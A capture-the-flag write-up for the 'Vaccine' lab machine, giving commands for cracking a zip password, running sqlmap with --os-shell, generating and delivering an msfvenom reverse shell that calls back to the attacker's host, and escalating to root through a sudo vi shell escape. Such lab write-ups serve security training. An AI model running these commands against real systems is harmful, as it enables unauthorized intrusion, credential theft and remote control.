---
title: Vaccine
published: true
tags: [Databases, Injection, Apache, PostgreSQL, FTP, PHP, Password Cracking, RCE]
---

An easy box with with a sql injection vulnerability.

Start with adding Vaccine to `/etc/hosts` then after the initial nmap scan we can service scan the 3 ports we discover.

- `sudo nmap -sC -sV -O -p21,22,80 vaccine.htb -oN nmap_second`

FTP access allows anonymous login we can grab a file `backup.zip` from there. Trying to unzip this file we have a password protected zip file containingh index.php and style.css

We can use johns `zip2john backup.zip > backup.zip.hash` to create a readable hash we can feed to john to crack the zipfile. once complete feed to john with `john backup.zip.hash` and we find the password `741852963`.

Checking the index.php we find some credentials `admin` and an md5 password which we can feed to crackstation.net and get `qwerty789` Login to admin.

The next page we coem to has a search and using sqlmap to test for injection we get lucky `sqlmap -u http://vaccine.htb/dashboard.php?search=1 --os-shell --cookie=PHPSESSID=o4htgfqc51canihdh9o93rdc44`

we can use this to get a reverse shell on the target. 

- generate payload `msfvenom -p linux/x86/meterpreter_reverse_tcp -f elf LHOST=10.10.16.193 LPORT=8765 > rev.elf` and wget over to the target.

After setting up a multi handler with the correct payload ./rev.elf and get a shell. We could have also just read the .ssh file inside the postgres home dir and grab the id_rsa. Doing that now for a stable connection.

Inside the /var/www/html we find a dashboard.php with postgres creds. `P@s5w0rd!` allowing us to run `sudo -l`

```
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

- `sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf`
- FOLLOWED BY `:!/bin/sh` and we are root.








